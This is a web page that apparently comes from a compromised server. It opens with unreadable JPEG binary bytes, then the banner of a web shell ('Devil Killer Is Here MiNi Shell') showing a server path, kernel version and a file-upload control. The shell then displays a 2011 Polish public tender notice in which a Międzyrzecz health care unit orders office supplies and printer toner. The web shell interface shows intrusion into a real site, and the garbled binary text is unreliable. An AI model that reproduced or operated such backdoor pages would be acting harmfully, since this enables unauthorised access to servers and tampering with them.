JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110421/87218-N-2011.html

<p class="kh_header"><b>Międzyrzecz: Dostawy:
Artykułów biurowych i materiałów eksploatacyjnych do urządzeń biurowych.</b><br>
<b>Numer ogłoszenia: 87218 - 2011; data zamieszczenia: 21.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Konstytucji 3 Maja 35, 66-300 Międzyrzecz, woj. lubuskie, tel. 095 7428298.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy:
Artykułów biurowych i materiałów eksploatacyjnych do urządzeń biurowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet 1
1	Antyrama A4 plex	szt	100
2	Bateria LR03	szt	50
3	Bateria LR6	szt	1000
4	Bateria R14	szt	80
5	Bateria R20 	szt	10
6	Bibuła marszczona kolor mix /10/	opk	5
7	Blok makulaturowy A4/100	szt	100
8	Blok makulaturowy A5/100	szt	50
9	Blok rysunkowy A4 	szt	25
10	Blok rysunkowy A4 kolor	szt	10
11	Blok techniczny A4	szt	25
12	Blok techniczny A4 kolor	szt	15
13	Brulion A4/96 TO	szt	30
14	Brulion A5/96 TO	szt	60
15	Brystol /10/	opk	2
16	Cienkopisy kolor 	szt	20
17	Długopis PILOT super grip /F/lub równoważny	szt	120
18	Długopis S-FINE /25//lub równoważny	opk	5
19	Długopis SN 101/lub równoważny	szt	120
20	Długopis żel HANDY /12//lub równoważny	opk	20
21	Dyski CD-R /10/	opk	5
22	Dyskietki 3,5 /10/	opk	5
23	Dziennik korespondencyjny A4/200	szt	3
24	Dziennik korespondencyjny A4/96	szt	6
25	Dziurkacz biurowy do 25 kartek LACO/lub równoważny	szt	10
26	Dziurkacz biurowy metal do 100 kartek TY 845/lub równoważny	szt	1
27	Etykieta samoprzylepna 52,5*21,2 biała /100/	opk	1
28	Etykieta samoprzylepna A4 biała /100/	opk	5
29	FA VAT A4 brutto /S/	szt	20
30	FA VAT A5 /S/	szt	5
31	FA VAT A5 brutto /S/	szt	5
32	FA wewnętrzna A5 /S/	szt	5
33	Fastykuła A4 szara	szt	500
34	Flamastry 6 kol	opk	5
35	Gumka do mazania biała	szt	20
36	Gumka recepturka 1 kg /60/	opk	10
37	Kalendarz planer A2 na biurko z lis.	szt	10
38	Kalka maszynowa A4/25	opk	5
39	Kalka ołówkowa A4/25	opk	15
40	Kalkulator na biurko /12 cyfrowy/ 	szt	5
41	Karton wizytówkowy A4/20 płótno ecru	opk	10
42	Klej kulkowy 50 ml	szt	20
43	Klej sztyft BANTEX 36 g/lub równoważny	szt	24
44	Klej sztyft BANTEX 8 g/lub równoważny	szt	250
45	Klej typu super glu /12/	opk	12
46	Koperta AIR 16 biała	szt	10
47	Koperta AIR 17 biała	szt	30
48	Koperta B4 SK biała /50/	opk	100
49	Koperta B5 NK brązowa /500/	opk	5
50	Koperta B5 SK biała /25/	opk	20
51	Koperta C4 SK biała /25/	opk	50
52	Koperta C6 SK biała /1000/	 	5
53	Koperta C6 SK biała /50/	opk	100
54	Koperta SDS-200	szt	30
55	Koperta SDS-220	szt	30
56	Korektor myszka HANDY/lub równoważny	szt	36
57	Korektor w pisaku PENTEL płaski metal/lub równoważny	szt	60
58	Korektor w płynie 	szt	36
59	Kostka biała klejona	szt	120
60	Kostka biała NK	szt	60
61	Kostka kolor klejona	szt	60
62	Kostka kolor NK	szt	60
63	KP A6 /S/	szt	5
64	Kredki ołówkowe 12 kol	opk	5
65	Kredki świecowe 18 kol	opk	2
66	KW A6 /S/	szt	5
67	Kwitariusz przychodów A5 /S/	szt	100
68	Linijka 20 cm 	szt	10
69	Linijka 30 cm 	szt	10
70	Linijka 40 cm 	szt	10
71	Linijka 50 cm 	szt	10
72	Marker olejowy średni	szt	150
73	Marker pernament okrągła końcówka czarny	szt	150
74	Marker pernament okrągła końcówka kolor	szt	25
75	Marker pernament ścięta końcówka czarny	szt	150
76	Marker pernament ścięta końcówka kolor	szt	25
77	Modelina 10 kol	opk	10
78	Notes samoprzylepny żółty 38*51	opk	12
79	Notes samoprzylepny żółty 76*100	opk	12
80	Notes samoprzylepny żółty 76*76	opk	12
81	Nożyczki biurowe 15,5 cm	szt	12
82	Nożyczki biurowe 17,5 cm	szt	13
83	Obowluta A4 z klapką /10/	opk	20
84	Obwoluta B4 z klapką /10/	opk	50
85	Obwoluta groszkowa A4 /100/	opk	150
86	Okładka do bindowania przeźroczysta /100/	opk	2
87	Okładka do bindowania tektura kolor /100/	opk	2
88	Ołówek HB /12/	opk	15
89	Papier kancelaryjny A3 # /500/	opk	2
90	Papier komputerowy 240*12 1+0	opk	5
91	Papier komputerowy 240*12 1+1 kolor/nadruk	opk	5
92	Papier komputerowy 240*12 1+1 kolor/nadruk	opk	5
93	Papier komputerowy 360*12 1+2 kolor	opk	2
94	Papier ksero A3 Polspeed /500//lub równoważny	opk	10
95	Papier ksero A4 Pollux /500//lub równoważny	opk	50
96	Papier ksero A4 Polspeed /500//lub równoważny	opk	700
97	Pinezka do tablic korkowych /25/	opk	5
98	Pinezki tablicowe /50/	opk	5
99	Pisaki dwustronne 12 szt 	opk	2
100	Pisaki foliopisy	szt	150
101	Pojemniki do archiwum A4/10 VAUPE	szt	50
102	Pojemniki do archiwum A4/7 VAUPE	szt	50
103	Polecenie ksiegowania A5	szt	10
104	Półka na dokumenty	szt	12
105	Przekładki do segregatora 1/3 A4 kolor /100/	opk	10
106	Pudła zbiorcze do archiwum A4/10 VAUPE	szt	20
107	Pudła zbiorcze do archiwum A4/10 VAUPE	szt	20
108	Rachunek A6 /S/	szt	5
109	Raport kasowy A4	szt	10
110	Rolka do faksu 210*30	szt	12
111	Rolka do faksu 216*25	szt	24
112	Rolka do faksu 216*30	szt	24
113	Rolka offset 57*25 /10/	opk	15
114	Rolka offset 57*30 /10/	opk	5
115	Rolka termo 57*30 /10/	opk	10
116	Rozszywacz	szt	5
117	Segregator A4/5 szyna BANTEX kolor folia/lub równoważny	szt	100
118	Segregator A4/5 VAUPE okuty/lub równoważny	szt	100
119	Segregator A4/7 szyna BANTEX kolor folia/lub równoważny	szt	150
120	Segregator A4/7 VAUPE okuty/lub równoważny	szt	150
121	Segregatory archiwizacyjne A4/7	szt	50
122	Skoroszyt 1/2 A4 /50/ BIGO zawieszka	opk	10
123	Skoroszyt A4 /50/ BIGO	opk	20
124	Skoroszyt A4 /50/ BIGO zawieszka	opk	20
125	Skoroszyt A4 PCV /25/	opk	50
126	Skoroszyt A4 PCV wpinany /25/	opk	50
127	Skorowidz 1/2 A4 TO	szt	5
128	Skorowidz A4 96 TO	szt	10
129	Skorowidz A5 96 TO	szt	5
130	Spinacz archiwizacyjny /50/	opk	2
131	Spinacze 28 /10/	opk	150
132	Tasma klejąca 18/30 /8/	opk	20
133	Taśma dwustronna 38	szt	20
134	Taśma meto 26/16 /5/ kolor	opk	30
135	Teczka do podpisu 8k	szt	5
136	Teczka na gumkę biała /10/	opk	15
137	Teczka na gumkę kolor /10/	opk	10
138	Teczka skrzydłowa na rzep 	szt	25
139	Teczka wiązana biała /10/	opk	15
140	Temperówka	szt	10
141	Tusz do stempli kolor	szt	50
142	Wąsy do skoroszytów metalowe /25/	opk	2
143	Wkład do długopisu SN 101 /12//lub równoważny	opk	5
144	Wkład do długopisu żel. HANDY /12//lub równoważny	opk	5
145	Wkład do segregatora A4 biały /50/	opk	25
146	Wkład do segregatora A5 biały /50/	opk	60
147	Wład do długopisu Pilot super grip /12//lub równoważny	opk	5
148	WZ 1/3 A4 / 6 poz/ /S/	szt	5
149	Zakreślacz kolor	szt	60
150	Zeszyt A4/96	szt	40
151	Zeszyt A5/16 #	szt	500
152	Zeszyt A5/32 #	szt	400
153	Zeszyt A5/60 #	szt	20
154	Zeszyt A5/80 #	szt	20
155	Zeszyt A5/96	szt	30
156	Zeszyt papierów kolorowych A4	szt	10
157	Zeszyt papierów kolorowych A5	szt	10
158	Zszywacz biurowy do 25 kartek LACO/lub równoważny	szt	10
159	Zszywki 24/6 /10/	opk	150

Pakiet 2
Toner HP LJ 5L/6L nr. kat C3906A	Szt.	6
Toner HP LJ 4/5 nr. 92298A (98A)	Szt.	2
Toner HP LJ 1010/1020 nr. kat. Q2612A (12A)	Szt.	20
Toner HP LJ 1100 nr. kat. C4092A	Szt.	8
Toner HP LJ 1320/1160 nr. Kat. Q5949A (49A)	Szt.	4
Katridż HP DJ6540	nr 339 (C8767EE) - czarny	Szt.	40
	nr 344 (C9363EE) - kolor	Szt.	30
Katridż HP DJ 3940/ PSC 1410/ D1360	nr 21 (C9351AE) - czarny	Szt.	40
	nr 22 (C9352AE) - kolor	Szt.	20
Katridż HP DJ 670C	nr 29 (51629GE) - czarny	Szt.	4
	nr 49 (51649NE) - kolor	Szt.	2
Katridż HP DJ3845/ OfficeJet 4255	nr 27 (C8727AE) - czarny	Szt.	4
	nr 28 (C8728AE) - kolor	Szt.	2
Katridż HP DJ5550	nr 56 (C6656AE) - czarny	Szt.	2
	nr 58 (C6658AE) - kolor	Szt.	2
Katridż HP DJ5440 oryginały	nr 336 (C9362EE) - czarny	Szt.	8
	nr 342 (C9361EE) - kolor	Szt.	4
HP LJ P1156	HP 78A ORYGINAŁY	Szt.	10
Katridż Lexmark X2330	No 1 nr 18C0781E	Szt.	20
Katridż Canon ip3000 oryginały	nr. BCI-5eBK - czarny	Szt.	14
	nr BCI-6C,M,Y (cyan,magenta,yellow)	Szt.	6
Toner Samsung ML-1520 nr. ML-1520D3	Szt.	2
Toner Samsung ML-1610 nr ML-1610D2 	Szt.	4
Toner Samsung ML-2010P nr ML-2010D3	Szt.	20
Toner Develop D16G nr 4518604/Typ 101B	Szt.	4
Taśma barwiąca OKI MICROLINE 321 nr 09002303	Szt.	6
Toner Xerox Phaser 3117 nr 106R01159	Szt.	8
Toner Xerox Phaser 3140	Szt.	20
Toner HP CP 1215	Czarny oryginał	Szt.	12
	Cyan oryginał	Szt.	6
	Magenta oryginał	Szt.	6
	Yellow oryginał	Szt.	6.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.44-2, 30.12.51.10-5, 30.12.45.12-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków udziału w postępowaniu wynikających z art. 22 ust.1 pkt 1-4 ustawy- Wykonawca zobowiązany jest złożyć oświadczenie
Na potwierdzenie braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy - Wykonawca zobowiązany jest złożyć oświadczenie oraz dokumenty wskazane w punkcie VI.

Ř	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;


Ř	posiadania wiedzy i doświadczenia.
Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Prawo Zamówień Publicznych. 

Ř	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Prawo Zamówień Publicznych

Ř	znajdowania się w sytuacji ekonomicznej i finansowej pozwalającej na wykonanie zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków udziału w postępowaniu wynikających z art. 22 ust.1 pkt 1-4 ustawy- Wykonawca zobowiązany jest złożyć oświadczenie
Na potwierdzenie braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy - Wykonawca zobowiązany jest złożyć oświadczenie oraz dokumenty wskazane w punkcie VI.

Ř	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;


Ř	posiadania wiedzy i doświadczenia.
Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Prawo Zamówień Publicznych. 

Ř	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Prawo Zamówień Publicznych

Ř	znajdowania się w sytuacji ekonomicznej i finansowej pozwalającej na wykonanie zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków udziału w postępowaniu wynikających z art. 22 ust.1 pkt 1-4 ustawy- Wykonawca zobowiązany jest złożyć oświadczenie
Na potwierdzenie braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy - Wykonawca zobowiązany jest złożyć oświadczenie oraz dokumenty wskazane w punkcie VI.

Ř	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;


Ř	posiadania wiedzy i doświadczenia.
Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Prawo Zamówień Publicznych. 

Ř	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Prawo Zamówień Publicznych

Ř	znajdowania się w sytuacji ekonomicznej i finansowej pozwalającej na wykonanie zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków udziału w postępowaniu wynikających z art. 22 ust.1 pkt 1-4 ustawy- Wykonawca zobowiązany jest złożyć oświadczenie
Na potwierdzenie braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy - Wykonawca zobowiązany jest złożyć oświadczenie oraz dokumenty wskazane w punkcie VI.

Ř	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;


Ř	posiadania wiedzy i doświadczenia.
Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Prawo Zamówień Publicznych. 

Ř	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Prawo Zamówień Publicznych

Ř	znajdowania się w sytuacji ekonomicznej i finansowej pozwalającej na wykonanie zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunków udziału w postępowaniu wynikających z art. 22 ust.1 pkt 1-4 ustawy- Wykonawca zobowiązany jest złożyć oświadczenie
Na potwierdzenie braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy - Wykonawca zobowiązany jest złożyć oświadczenie oraz dokumenty wskazane w punkcie VI.

Ř	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;


Ř	posiadania wiedzy i doświadczenia.
Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Prawo Zamówień Publicznych. 

Ř	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Prawo Zamówień Publicznych

Ř	znajdowania się w sytuacji ekonomicznej i finansowej pozwalającej na wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Dokumenty wymagane:

-	formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1
-	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert,
.	koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym niniejszym zamówieniem,
.	oświadczenie do postępowania o zamówienie publiczne z art. 22 ust. 1 Prawo zamówień publicznych z wykorzystaniem wzoru - załącznik nr 2
.	oświadczenie Oferenta, że zapoznał się z niniejszą specyfikacją i nie wnosi żadnych zastrzeżeń oraz, że zdobył konieczne informacje do przygotowania oferty   - załącznik nr 5
.	oświadczenie Oferenta   , że zapoznał się z projektem  umowy i nie wnosi uwag - załącznik nr 4</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.miedzyrzecz.spzoz.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Międzyrzeczu
ul. Konstytucji  3 Maja 35
66 - 300 Międzyrzecz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2011 godzina 09:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Międzyrzeczu
ul. Konstytucji  3 Maja 35
66 - 300 Międzyrzecz
Sala konferencyjna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie wymagane.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Antyrama A4 plex	szt	100
2	Bateria LR03	szt	50
3	Bateria LR6	szt	1000
4	Bateria R14	szt	80
5	Bateria R20 	szt	10
6	Bibuła marszczona kolor mix /10/	opk	5
7	Blok makulaturowy A4/100	szt	100
8	Blok makulaturowy A5/100	szt	50
9	Blok rysunkowy A4 	szt	25
10	Blok rysunkowy A4 kolor	szt	10
11	Blok techniczny A4	szt	25
12	Blok techniczny A4 kolor	szt	15
13	Brulion A4/96 TO	szt	30
14	Brulion A5/96 TO	szt	60
15	Brystol /10/	opk	2
16	Cienkopisy kolor 	szt	20
